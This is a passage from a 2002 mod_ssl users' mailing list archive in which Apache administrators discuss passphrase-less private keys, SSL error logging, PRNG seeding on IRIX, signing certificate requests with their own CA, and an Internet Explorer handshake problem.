Subject: Re: How do I create a un-encrypted private key (without pass phrase)? To: modssl-users@modssl.org In-Reply-To: <20020205202439.23983.qmail@web10903.mail.yahoo.com> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Pasumarthi Naveen X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users http://www.openssl.org/docs/apps/genrsa.html to my rescue got the correct arguments to the -passout flag. naveen --- Pasumarthi Naveen wrote: > I would like to create a un-encrypted > private key. Tried couple of combinations > with the "-passout" flag for "genrsa" with > no luck. > > Am I on the right track?? > > Can someone point me / provide the > openssl genrsa ...... command to create > a private key without user input of a > PEM passphrase > > alternatively > > is it possible for the passphrase be read > from a file? > > I understand this approach is not secure... > > Thanks a bunch, > Naveen > > > __________________________________________________ > Do You Yahoo!? > Send FREE Valentine eCards with Yahoo! Greetings! > http://greetings.yahoo.com > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) > www.modssl.org > User Support Mailing List > modssl-users@modssl.org > Automated List Manager majordomo@modssl.org __________________________________________________ Do You Yahoo!? Send FREE Valentine eCards with Yahoo! Greetings! http://greetings.yahoo.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Feb 6 05:21:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id FAA10346; Wed, 6 Feb 2002 05:20:09 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from sttlpop8.sttl.uswest.net id FAA10320; Wed, 6 Feb 2002 05:19:12 +0100 (MET) Received: (qmail 11782 invoked by uid 0); 6 Feb 2002 04:19:09 -0000 Received: from sttldslgw34poolb126.sttl.uswest.net (HELO wmtiabertj) (65.102.185.126) by sttlpop8.sttl.uswest.net with SMTP; 6 Feb 2002 04:19:09 -0000 Date: Tue, 5 Feb 2002 20:22:15 -0800 Message-ID: From: "Sir SoilentG_kov" To: modssl-users@modssl.org Subject: RE: How do I create a un-encrypted private key (without pass phrase)? MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Importance: Normal In-Reply-To: <20020205214730.46171.qmail@web10908.mail.yahoo.com> Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Sir SoilentG_kov" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I'd like you to be more descriptive please... what argument did you use? thanks, Jeff > -----Original Message----- > From: owner-modssl-users@modssl.org > [mailto:owner-modssl-users@modssl.org]On Behalf Of Pasumarthi Naveen > Sent: Tuesday, February 05, 2002 1:48 PM > To: modssl-users@modssl.org > Subject: Re: How do I create a un-encrypted private key (without pass > phrase)? > > > http://www.openssl.org/docs/apps/genrsa.html > to my rescue got the correct arguments > to the -passout flag. > > naveen > --- Pasumarthi Naveen wrote: > > I would like to create a un-encrypted > > private key. Tried couple of combinations > > with the "-passout" flag for "genrsa" with > > no luck. > > > > Am I on the right track?? > > > > Can someone point me / provide the > > openssl genrsa ...... command to create > > a private key without user input of a > > PEM passphrase > > > > alternatively > > > > is it possible for the passphrase be read > > from a file? > > > > I understand this approach is not secure... > > > > Thanks a bunch, > > Naveen > > > > > > __________________________________________________ > > Do You Yahoo!? > > Send FREE Valentine eCards with Yahoo! Greetings! > > http://greetings.yahoo.com > > > ______________________________________________________________________ > > Apache Interface to OpenSSL (mod_ssl) > > www.modssl.org > > User Support Mailing List > > modssl-users@modssl.org > > Automated List Manager > majordomo@modssl.org > > > __________________________________________________ > Do You Yahoo!? > Send FREE Valentine eCards with Yahoo! Greetings! > http://greetings.yahoo.com > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Feb 6 09:45:45 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id JAA21794; Wed, 6 Feb 2002 09:43:16 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id JAA21782; Wed, 6 Feb 2002 09:43:04 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 7818F4CE741; Wed, 6 Feb 2002 09:43:03 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g168gfk18016; Wed, 6 Feb 2002 09:42:41 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from hall.mail.mindspring.net id DAA05436; Wed, 6 Feb 2002 03:13:25 +0100 (MET) From: rwidmer@developersdesk.com Received: from 1cust242.tnt1.twin-falls.id.da.uu.net ([63.59.88.242] helo=mail.mindspring.com) by hall.mail.mindspring.net with smtp (Exim 3.33 #1) id 16YErk-0003FH-00 for modssl-users@modssl.org; Tue, 05 Feb 2002 18:19:08 -0500 To: modssl-users@modssl.org X-Mailer: Post Road Mailer for OS/2 (Green Edition Ver 3.0) Date: Tue, 5 Feb 2002 16:32:58 Subject: RE: Apache SSL redundancy Message-Id: Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: rwidmer@developersdesk.com X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users ** Reply to note from John.Airey@rnib.org.uk Tue, 5 Feb 2002 13:04:25 -0000 > > I have heard that AOL change dial-up IPs every 3-4 seconds. I have no > data to back this up, but considering their large user base it > wouldn't be surprising as they'd need to ensure that there are no > unused IPs out there (although of course a user should be able to > renew the lease on the IP they already have, but there you go). I have seen the initial page request and the requests for images for that page come from different AOL IP addresses. You can't trust IP addresses from the Internet to have any basis in reality. Rick Rick Widmer Internet Marketing Specialists http://www.developersdesk.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Feb 6 09:46:15 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id JAA21928; Wed, 6 Feb 2002 09:45:45 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from bull1.bourse.ch id JAA21836; Wed, 6 Feb 2002 09:44:07 +0100 (MET) Received: (from nobody@localhost) by bull1.bourse.ch (8.8.8+Sun/8.8.8) id JAA05941 for ; Wed, 6 Feb 2002 09:44:00 +0100 (MET) X-Authentication-Warning: bull1.bourse.ch: nobody set sender to using -f Received: from trifid2(172.20.196.132) by bull1 via smap (V2.1) id xma005850; Wed, 6 Feb 02 09:43:54 +0100 Received: from regulus.bourse.ch (regulus [172.20.196.148]) by trifid2.bourse.ch (8.8.8+Sun/8.8.8) with ESMTP id JAA15858 for ; Wed, 6 Feb 2002 09:43:54 +0100 (MET) Received: from bourse.ch (localhost [127.0.0.1]) by regulus.bourse.ch (8.9.3+Sun/8.9.3) with ESMTP id JAA15887 for ; Wed, 6 Feb 2002 09:43:53 +0100 (MET) Message-ID: <3C60ECC9.677A8615@bourse.ch> Date: Wed, 06 Feb 2002 09:43:53 +0100 From: Owen Boyle X-Mailer: Mozilla 4.76 [en] (X11; U; SunOS 5.8 sun4u) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: Stop mod_ssl from writing errors to the general Apache error logfile References: <3C60177B.3FC32DA9@t-online.net> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Owen Boyle X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Bert Courtin wrote: > > I wonder how I can stop mod_ssl from writing errors to the general > Apache error logfile. > Since your SSL site is defined by a virtualhost, simply put a separate ErrorLog directive in the SSL VH. Errors generated by that VH will go there instead of the global error_log. If you really don't want to see SSL errors at all, just do: < in SSL VH> ErrorLog /dev/null Rgds, Owen Boyle. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Feb 6 09:47:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id JAA21800; Wed, 6 Feb 2002 09:43:20 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id JAA21776; Wed, 6 Feb 2002 09:43:03 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 3E3FA4CE618; Wed, 6 Feb 2002 09:43:03 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g168gN217920; Wed, 6 Feb 2002 09:42:23 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from ulairi.csun.edu id AAA28354; Wed, 6 Feb 2002 00:42:01 +0100 (MET) From: ulairi@csun.edu Received: (qmail 11925 invoked by uid 60001); 5 Feb 2002 23:40:08 -0000 Received: from 130.166.10.27 ( [130.166.10.27]) as user ulairi@ulairi.csun.edu by ulairi.csun.edu with HTTP; Tue, 5 Feb 2002 15:40:08 +0800 Message-ID: <1012952408.3c606d58a87fd@ulairi.csun.edu> Date: Tue, 5 Feb 2002 15:40:08 +0800 To: modssl-users@modssl.org Subject: SSLRandomSeed set to PRNGD socket = apache fails to start on IRIX MIME-Version: 1.0 Content-Type: text/plain; charset=windows-1252;q=1.0 Content-Transfer-Encoding: 8bit User-Agent: Internet Messaging Program (IMP) 2.3.7-cvs Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: ulairi@csun.edu X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Ok, first, the environment: SGI Octane running IRIX 6.5.13f Apache 1.3.22 ModSSL 2.8.5 OpenSSL 0.9.6b PRNGD 0.9.17 and 0.9.23 If I have the following in my config: SSLRandomSeed startup file:/dev/urandom2 512 SSLRandomSeed connect file:/dev/urandom2 512 The logs show: [Tue Feb 5 15:30:43 2002] [error] mod_ssl: Init: Failed to generate temporary 512 bit RSA private key (OpenSSL library error follows) [Tue Feb 5 15:30:43 2002] [error] OpenSSL: error:24064064:random number generator:SSLEAY_RAND_BYTES:PRNG not seeded [Tue Feb 5 15:30:43 2002] [error] OpenSSL: error:04069003:rsa routines:RSA_generate_key:BN lib If I switch to builtin, it works. Here's the weird part - I have OpenSSH 3.0.2p2 using /dev/urandom without a problem, and using PRNGD's suggested ways of testing things (via egc.pl) shows no errors. Anything anyone can suggest? ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Feb 6 09:51:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id JAA22074; Wed, 6 Feb 2002 09:50:12 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from bull1.bourse.ch id JAA22063; Wed, 6 Feb 2002 09:49:57 +0100 (MET) Received: (from nobody@localhost) by bull1.bourse.ch (8.8.8+Sun/8.8.8) id JAA09444 for ; Wed, 6 Feb 2002 09:49:50 +0100 (MET) X-Authentication-Warning: bull1.bourse.ch: nobody set sender to using -f Received: from trifid2(172.20.196.132) by bull1 via smap (V2.1) id xma009398; Wed, 6 Feb 02 09:49:47 +0100 Received: from regulus.bourse.ch (regulus [172.20.196.148]) by trifid2.bourse.ch (8.8.8+Sun/8.8.8) with ESMTP id JAA17462 for ; Wed, 6 Feb 2002 09:49:47 +0100 (MET) Received: from bourse.ch (localhost [127.0.0.1]) by regulus.bourse.ch (8.9.3+Sun/8.9.3) with ESMTP id JAA16286 for ; Wed, 6 Feb 2002 09:49:45 +0100 (MET) Message-ID: <3C60EE29.C9C425E0@bourse.ch> Date: Wed, 06 Feb 2002 09:49:45 +0100 From: Owen Boyle X-Mailer: Mozilla 4.76 [en] (X11; U; SunOS 5.8 sun4u) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: SSL Certs References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Owen Boyle X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Brandon Amundson wrote: > > We have created a CA using openssl for our apache server which is running on > linux.. We currently have more than 200 users that access our site via > certificates. Here is what we are having problems doing. > > We have an IIS Web server which we would like to allow our current > certificate users to be able to access with their existing certs. Is it > possible to generate a server certificate request on the IIS server and have > that signed by the CA on the linux box? If this were possible, would this > allow our researchers access to the second website with the same certs? > > Again, if this is possible, what is the command to have the request signed > by the CA? We have attempted this and we continue to get an error. Here is > the error. Put a subject on your postings so you'll know if someone responds... AFAIK, certificates are all in a standard format and so are cross-platform. To sign the certificate, use the sign.sh script that comes with the mod_ssl distro (in the pkg.contrib directory). Rgds, Owen Boyle. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Feb 6 10:26:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA23683; Wed, 6 Feb 2002 10:25:19 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id KAA23643; Wed, 6 Feb 2002 10:24:50 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 6F9A84CE53D; Wed, 6 Feb 2002 10:24:49 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g1696Kx30502; Wed, 6 Feb 2002 10:06:20 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from daisy.tele2.ee id JAA22032; Wed, 6 Feb 2002 09:48:34 +0100 (MET) Received: (qmail 20987 invoked from network); 6 Feb 2002 08:48:32 -0000 Received: from tln-wll1-5145.tele2.ee (HELO sierra) (212.107.51.45) by daisy.tele2.ee with SMTP; 6 Feb 2002 08:48:32 -0000 Message-ID: <004501c1aeea$eec431a0$2d336bd4@tele2.ee> From: "Thomas Lepik" To: Subject: Problem with IE Date: Wed, 6 Feb 2002 10:47:39 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.3018.1300 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.3018.1300 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Thomas Lepik" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hello, I compiled apache-1.3.2+mod_ssl-2.8.6+php-4.1.1 sucessfully on RH 7.2 Linux. I created certificates, modified httpd.conf for my needs and started apache with ssl option. Things seemed to be working fine - even tested with lynx browser to see wheather https://localhost gives a connection - and it did! But when tested with M$ IE 5.0 (with high encryption patch that allows 128 bit chipher), I constantly ran into "page cannot be displayed" - eventhough I modified httpd.conf's SSL section several times as suggested here before. (if IE setenv xxx and, SSL -v3, session cache things) Any time - lynx displays the page and IE doesn't. Here are two samples from my ssl_engine_log. First one with lynx browser, second one with my troublesome IE. (also included server startup lines to ensure that server is running smoothly) server startup: ----------------- 06/Feb/2002 10:29:06 09923] [info] Init: Configuring server emedia.se:443 for SSL protocol [06/Feb/2002 10:29:06 09923] [trace] Init: (emedia.se:443) Creating new SSL context (protocols: SSLv2, SSLv3, TLSv1) [06/Feb/2002 10:29:06 09923] [trace] Init: (emedia.se:443) Configuring permitted SSL ciphers [ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP] [06/Feb/2002 10:29:06 09923] [trace] Init: (emedia.se:443) Configuring RSA server certificate [06/Feb/2002 10:29:06 09923] [trace] Init: (emedia.se:443) Configuring RSA server private key [06/Feb/2002 10:29:06 09923] [trace] Init: (emedia.se:443) Configuring server certificate chain (1 CA certificate) ------------- Lynx browser: ---------------- [06/Feb/2002 10:29:41 09924] [info] Connection to child 0 established (server emedia.se:443, client 212.107.xx.xx) [06/Feb/2002 10:29:41 09924] [info] Seeding PRNG with 23177 bytes of entropy [06/Feb/2002 10:29:41 09924] [trace] OpenSSL: Handshake: start [06/Feb/2002 10:29:41 09924] [trace] OpenSSL: Loop: before/accept initialization [06/Feb/2002 10:29:41 09924] [trace] OpenSSL: Loop: SSLv3 read client hello A [06/Feb/2002 10:29:41 09924] [trace] OpenSSL: Loop: SSLv3 write server hello A [06/Feb/2002 10:29:41 09924] [trace] OpenSSL: Loop: SSLv3 write certificate A [06/Feb/2002 10:29:41 09924] [trace] OpenSSL: Loop: SSLv3 write key exchange A [06/Feb/2002 10:29:41 09924] [trace] OpenSSL: Loop: SSLv3 write server done A [06/Feb/2002 10:29:41 09924] [trace] OpenSSL: Loop: SSLv3 flush data [06/Feb/2002 10:29:42 09924] [trace] OpenSSL: Loop: SSLv3 read client key exchange A [06/Feb/2002 10:29:42 09924] [trace] OpenSSL: Loop: SSLv3 read finished A [06/Feb/2002 10:29:42 09924] [trace] OpenSSL: Loop: SSLv3 write change cipher spec A [06/Feb/2002 10:29:42 09924] [trace] OpenSSL: Loop: SSLv3 write finished A [06/Feb/2002 10:29:42 09924] [trace] OpenSSL: Loop: SSLv3 flush data [06/Feb/2002 10:29:42 09924] [trace] Inter-Process Session Cache: request=SET status=OK id=6ACADD8B778A6BFFDF0E22CCC0023F4B080C297422FA989923FC36348E3FFD83 timeout=599s (session caching) [06/Feb/2002 10:29:42 09924] [trace] OpenSSL: Handshake: done [06/Feb/2002 10:29:42 09924] [info] Connection: Client IP: 212.107.xx.xx, Protocol: TLSv1, Cipher: EDH-RSA-DES-CBC3-SHA (168/168 bits) [06/Feb/2002 10:29:42 09924] [info] Initial (No.1) HTTPS request received for child 0 (server emedia.se:443) [06/Feb/2002 10:29:42 09924] [trace] OpenSSL: Write: SSL negotiation finished successfully [06/Feb/2002 10:29:42 09924] [info] Connection to child 0 closed with standard shutdown (server emedia.se:443, client 212.107.xx.xx) -------------- Now with IE --------------- Connection to child 1 established (server emedia.se:443, client 212.107.xx.xx) [06/Feb/2002 10:32:37 09925] [info] Seeding PRNG with 23177 bytes of entropy [06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Handshake: start [06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: before/accept initialization [06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: SSLv3 read client hello A [06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: SSLv3 write server hello A [06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: SSLv3 write certificate A [06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: SSLv3 write server done A [06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: SSLv3 flush data [06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: SSLv3 read client key exchange A [06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: SSLv3 read finished A [06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: SSLv3 write change cipher spec A [06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: SSLv3 write finished A [06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: SSLv3 flush data [06/Feb/2002 10:32:37 09925] [trace] Inter-Process Session Cache: request=SET st atus=OK id=C52B666B384B0E4DD7F0BDB6D6F8E8118E3AA5748DF993A553C4CC4E2FB86606 timeout=600s (session caching) [06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Handshake: done [06/Feb/2002 10:32:37 09925] [info] Connection: Client IP: 212.107.xx.xx, Protocol: SSLv3, Cipher: RC4-MD5 (128/128 bits) [06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Write: SSL negotiation finished successfully [06/Feb/2002 10:32:37 09925] [info] Connection to child 1 closed with standard shutdown (server emedia.se:443, client 212.107.xx.xx) ---------- Best regards, Thomas. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Feb 6 10:38:18 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA24214; Wed, 6 Feb 2002 10:37:11 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from sttlpop6.sttl.uswest.net id KAA24184; Wed, 6 Feb 2002 10:36:19 +0100 (MET) Received: (qmail 4216 invoked by uid 0); 6 Feb 2002 09:36:16 -0000 Received: from sttldslgw34poolb126.sttl.uswest.net (HELO wmtiabertj) (65.102.185.126) by sttlpop6.sttl.uswest.net with SMTP; 6 Feb 2002 09:36:16 -0000 Date: Wed, 6 Feb 2002 01:39:08 -0800 Message-ID: From: "Sir SoilentG_kov" To: modssl-users@modssl.org Subject: RE: How do I create a un-encrypted private key (without pass phrase)? MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) In-Reply-To: <20020205214730.46171.qmail@web10908.mail.yahoo.com> X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Importance: Normal Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Sir SoilentG_kov" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users actually no need to reply my request for an explanation... i went to the mod-ssl.org page and re-read the FAQ and the thing I was after was the way to bypass the Apache "wait for PEM code" thingy. It's in the FAQ's and was very easy to do. Now I can boot remotely and walk away :) Security? well, if someone can get into the /etc/httpd/conf/ssl directory then I'm hosed anyhow so why worry? I think one of the guru's around here even said p'word protecting the keys is sorta useless... maybe I saw that in the archives... dunno. link to FAQ with specific info FYI: http://www.modssl.org/docs/2.8/ssl_faq.html#remove-passphrase Jeff > -----Original Message----- > From: owner-modssl-users@modssl.org > [mailto:owner-modssl-users@modssl.org]On Behalf Of Pasumarthi Naveen > Sent: Tuesday, February 05, 2002 1:48 PM > To: modssl-users@modssl.org > Subject: Re: How do I create a un-encrypted private key (without pass > phrase)? > > > http://www.openssl.org/docs/apps/genrsa.html > to my rescue got the correct arguments > to the -passout flag. > > naveen > --- Pasumarthi Naveen wrote: > > I would like to create a un-encrypted > > private key. Tried couple of combinations > > with the "-passout" flag for "genrsa" with > > no luck. > > > > Am I on the right track?? > > > > Can someone point me / provide the > > openssl genrsa ...... command to create > > a private key without user input of a > > PEM passphrase > > > > alternatively > > > > is it possible for the passphrase be read > > from a file? > > > > I understand this approach is not secure... > > > > Thanks a bunch, > > Naveen > > > > > > __________________________________________________ > > Do You Yahoo!? > > Send FREE Valentine eCards with Yahoo! Greetings! > > http://greetings.yahoo.com > > > ______________________________________________________________________ > > Apache Interface to OpenSSL (mod_ssl) > > www.modssl.org > > User Support Mailing List > > modssl-users@modssl.org > > Automated List Manager > majordomo@modssl.org > > > __________________________________________________ > Do You Yahoo!? > Send FREE Valentine eCards with Yahoo! Greetings! > http://greetings.yahoo.com > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Feb 6 11:11:03 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id LAA26507; Wed, 6 Feb 2002 11:10:11 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from serv01.aet.tu-cottbus.de id LAA26477; Wed, 6 Feb 2002 11:09:20 +0100 (MET) Received: from localhost (localhost [127.0.0.1]) by serv01.aet.tu-cottbus.de (Postfix) with ESMTP id 6423F208E for ; Wed, 6 Feb 2002 11:09:17 +0100 (MET) Received: by serv01.aet.tu-cottbus.de (Postfix, from userid 11019) id 15C712073; Wed, 6 Feb 2002 11:09:15 +0100 (MET) Date: Wed, 6 Feb 2002 11:09:14 +0100 From: Lutz Jaenicke To: modssl-users@modssl.org Subject: Re: SSLRandomSeed set to PRNGD socket = apache fails to start on IRIX Message-ID: <20020206100914.GA4329@serv01.aet.tu-cottbus.de> Mail-Followup-To: modssl-users@modssl.org References: <1012952408.3c606d58a87fd@ulairi.csun.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <1012952408.3c606d58a87fd@ulairi.csun.edu> User-Agent: Mutt/1.3.27i Organization: BTU Cottbus, Allgemeine Elektrotechnik X-Virus-Scanned: by AMaViS snapshot-20011031 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Lutz Jaenicke X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Tue, Feb 05, 2002 at 03:40:08PM +0800, ulairi@csun.edu wrote: > Ok, first, the environment: > SGI Octane running IRIX 6.5.13f > Apache 1.3.22 > ModSSL 2.8.5 > OpenSSL 0.9.6b > PRNGD 0.9.17 and 0.9.23 > > If I have the following in my config: > SSLRandomSeed startup file:/dev/urandom2 512 > SSLRandomSeed connect file:/dev/urandom2 512 > > The logs show: > [Tue Feb 5 15:30:43 2002] [error] mod_ssl: Init: Failed to generate temporary 512 bit RSA private key (OpenSSL library error follows) > [Tue Feb 5 15:30:43 2002] [error] OpenSSL: error:24064064:random number generator:SSLEAY_RAND_BYTES:PRNG not seeded > [Tue Feb 5 15:30:43 2002] [error] OpenSSL: error:04069003:rsa routines:RSA_generate_key:BN lib > > If I switch to builtin, it works. > > Here's the weird part - I have OpenSSH 3.0.2p2 using /dev/urandom without a problem, and using PRNGD's suggested ways of testing things (via egc.pl) shows no errors. You must specify the correct protocol to be used: SSLRandomSeed startup egd:/path/to/egd-socket ... ^^^ Best regards, Lutz -- Lutz Jaenicke Lutz.Jaenicke@aet.TU-Cottbus.DE http://www.aet.TU-Cottbus.DE/personen/jaenicke/ BTU Cottbus, Allgemeine Elektrotechnik Universitaetsplatz 3-4, D-03044 Cottbus ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Feb 6 12:06:12 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id MAA29147; Wed, 6 Feb 2002 12:05:35 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from bull1.bourse.ch id MAA28983; Wed, 6 Feb 2002 12:05:09 +0100 (MET) Received: (from nobody@localhost) by bull1.bourse.ch (8.8.8+Sun/8.8.8) id MAA16381 for ; Wed, 6 Feb 2002 12:05:01 +0100 (MET) X-Authentication-Warning: bull1.bourse.ch: nobody set sender to using -f Received: from trifid2(172.20.196.132) by bull1 via smap (V2.1) id xma016249; Wed, 6 Feb 02 12:04:53 +0100 Received: from regulus.bourse.ch (regulus [172.20.196.148]) by trifid2.bourse.ch (8.8.8+Sun/8.8.8) with ESMTP id MAA24534 for ; Wed, 6 Feb 2002 12:04:53 +0100 (MET) Received: from bourse.ch (localhost [127.0.0.1]) by regulus.bourse.ch (8.9.3+Sun/8.9.3) with ESMTP id MAA27446 for ; Wed, 6 Feb 2002 12:04:51 +0100 (MET) Message-ID: <3C610DD3.E26044FF@bourse.ch> Date: Wed, 06 Feb 2002 12:04:51 +0100 From: Owen Boyle X-Mailer: Mozilla 4.76 [en] (X11; U; SunOS 5.8 sun4u) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: How do I create a un-encrypted private key (without pass phrase)? References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Owen Boyle X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Sir SoilentG_kov wrote: > > It's in the FAQ's and was very easy to do. Now I can boot remotely and > walk away :) Security? well, if someone can get into the > /etc/httpd/conf/ssl > directory then I'm hosed anyhow so why worry? I think one of the guru's > around here even said p'word protecting the keys is sorta useless... maybe I > saw that in the archives... dunno. Having a password means that no-one can use your certificate - even if they obtain a copy of it. They can load the cert into their server but it won't let the server come up unless they know the password. The downside is that you have to type in the password personally to start apache. Tricks like putting the password in a program and so on just shift the risk - the hacker just needs to grab the program. My personal tuppence-worth is that if you have a machine where there is a risk that hackers can steal root-privileged files then you should not be running it as an SSL web-server (if they can steal a cert, they can steal your customer's private data - exposing you to a liability issue). So if you protect your server to the utmost, you have no need of a password protected certificate. Rgds, Owen Boyle ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Feb 6 14:05:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id OAA05519; Wed, 6 Feb 2002 14:04:08 +0100 (MET) Received: by 